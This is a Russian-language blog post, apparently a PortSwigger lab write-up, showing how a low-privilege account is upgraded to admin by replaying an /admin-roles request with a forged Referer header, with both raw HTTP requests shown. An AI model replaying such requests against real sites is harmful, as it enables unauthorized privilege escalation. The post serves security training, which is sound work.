Kir 'cu63'

Работаю вирусным аналитиком уже 3 года. Хочу вкатиться в Баг Баунти, поэтому изучаю веб уязвимости и описываю свой путь в данном блоге. Присоединяйтеся:3

У нас есть данные для входа в учетную запись администратора administrator:admin и в нашу wiener:peter.

Для прохождения лабы нужно повысить права нашего аккаунта через уязвимость контроля доступа через Referer.

https://0a5e006703ed1e9880425d3c005b0030.web-security-academy.net/

Solution

Зайду в ЛК админа. Зайду в панель админа и повышу пользователя carlos, чтобы собрать запросы:

IMG

Запрос:

GET /admin-roles?username=carlos&action=upgrade HTTP/2
Host: 0a5e006703ed1e9880425d3c005b0030.web-security-academy.net
Cookie: session=vu0K5L2D8wqkJO7XF1Cs8V0v69YtIvPv
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a5e006703ed1e9880425d3c005b0030.web-security-academy.net/admin
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Закину его в Repeater. Иду в аккаунт wiener. Возьму новое значение Cookies, чтобы отправлять запрос от лица непривилегированного пользователя:

GET /admin-roles?username=wiener&action=upgrade HTTP/2
Host: 0a5e006703ed1e9880425d3c005b0030.web-security-academy.net
Cookie: session=OMEHhZhAsIgyAXcqFzGuShFq239HqLgI
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a5e006703ed1e9880425d3c005b0030.web-security-academy.net/admin
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Получилось… Слишком просто.

Глянул разбор. Идея был в том, чтобы взять именно URL /admin-roles?username=carlos&action=upgrade, а дальше уже подставить значение Referer, которое используется для зашиты доступа к API-ручкам админа. Но я скопировал запрос, поэтому у меня это поле уже было) Таков путь…

IMG

You May Also Enjoy

Exploiting blind XXE to exfiltrate data using a malicious external DTD

1 minute read

В этой лабораторной работе есть функция Check stock, которая обрабатывает XML-ввод, но не отображает результат. Чтобы решить лабораторную, необходимо получит...

Exploiting blind XXE to retrieve data via error messages

1 minute read

В этой лабораторной работе есть функция Check stock, которая обрабатывает XML-ввод, но не отображает результат. Чтобы решить лабораторную, нужно использовать...